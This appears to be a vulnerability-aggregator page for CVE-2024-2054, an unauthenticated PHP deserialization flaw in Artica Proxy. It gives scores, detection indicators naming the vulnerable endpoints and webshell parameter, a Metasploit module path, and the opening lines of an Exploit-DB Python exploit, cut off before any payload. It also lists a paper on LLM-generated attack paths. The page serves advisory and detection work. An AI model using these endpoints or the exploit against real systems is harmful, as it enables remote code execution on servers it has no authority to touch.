CVE-2024-2054
published 2024-03-21CVE-2024-2054: The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution…
PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
81.26%
99.6th percentile
The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| artica_tech | artica_proxy | — | — |
| articatech | artica_proxy | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated GET requests to /wizard/wiz.wizard.progress.php containing the 'build-js' query parameter with a serialized PHP object payload — this is the deserialization trigger. ↗
- →Detect GET requests to /wizard/wiz.upload.php with a 'cmd' query parameter — this indicates webshell-style command execution following successful deserialization exploitation. ↗
- →Monitor for processes spawned as the 'www-data' user executing unexpected OS commands, which is the post-exploitation execution context for this CVE. ↗
- →The exploit was successfully weaponized via Metasploit (module: exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054); monitor for Metasploit reverse shell indicators on hosts running Artica Proxy 4.40/4.50. ↗
- ·The exploit targets Artica Proxy versions 4.40 and 4.50 specifically; other versions may not be affected. ↗
- ·The administrative web interface port (default 9000) may vary depending on deployment configuration, which could affect network-layer detection rules. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Artica Proxy 4.50 - Remote Code Execution (RCE)
exploitdb·2025-04-09·CVSS 9.8
CVE-2024-2054 [CRITICAL] Artica Proxy 4.50 - Remote Code Execution (RCE)
Artica Proxy 4.50 - Remote Code Execution (RCE)
---
# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE)
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054
you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054
import requests
import base64
import urllib3
from colorama import Fore
print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
sometimes vary from how artica proxy interface is hosted")
URL = input("Enter url: ")
if URL[-1]=="/":
ACTUAL_URL = URL[:-1]
else:
ACTUAL_URL = URL
ARTICA_URL = ACTUAL_URL
def check(ARTICA_URL):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
check = requests.g
Metasploit
Artica Proxy Unauthenticated PHP Deserialization Vulnerability
metasploit
Artica Proxy Unauthenticated PHP Deserialization Vulnerability
Artica Proxy Unauthenticated PHP Deserialization Vulnerability
A Command Injection vulnerability in Artica Proxy appliance version 4.50 and 4.40 allows remote attackers to run arbitrary commands via unauthenticated HTTP request. The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.
Greynoiseio
NoiseLetter August 2024
blogs_greynoiseio
NoiseLetter August 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
arXiv
AEGIS: White-Box Attack Path Generation using LLMs and Training Effectiveness Evaluation for Large-Scale Cyber Defence Exercises
arxiv_fulltext·2026-01-30
AEGIS: White-Box Attack Path Generation using LLMs and Training Effectiveness Evaluation for Large-Scale Cyber Defence Exercises
AEGIS: White-Box Attack Path Generation using LLMs and
Training Effectiveness Evaluation for Large-Scale Cyber Defence Exercises
Ivan K.\ Tung\,0000-0001-9454-1905, Shi Yu Xiang\,0009-0004-4870-4290, Alex Chien\,0009-0001-9727-2509, Liu Wenkai\,0009-0005-1953-7523, Lawrence Zheng\,0009-0005-9623-3347
Cyber Defence Test and Evaluation Centre (CyTEC),
The Digital and Intelligence Service (DIS), Singapore Armed Forces
## Abstract
Creating attack paths for cyber defence exercises requires substantial expert effort. Existing automation requires vulnerability graphs or exploit sets curated in advance, limiting where it can be applied. We present AEGIS, a system that generates attack paths using LLMs, white-box access, and Monte Carlo Tree Search over real exploit execution. LLM-based searc
2024-03-21
Published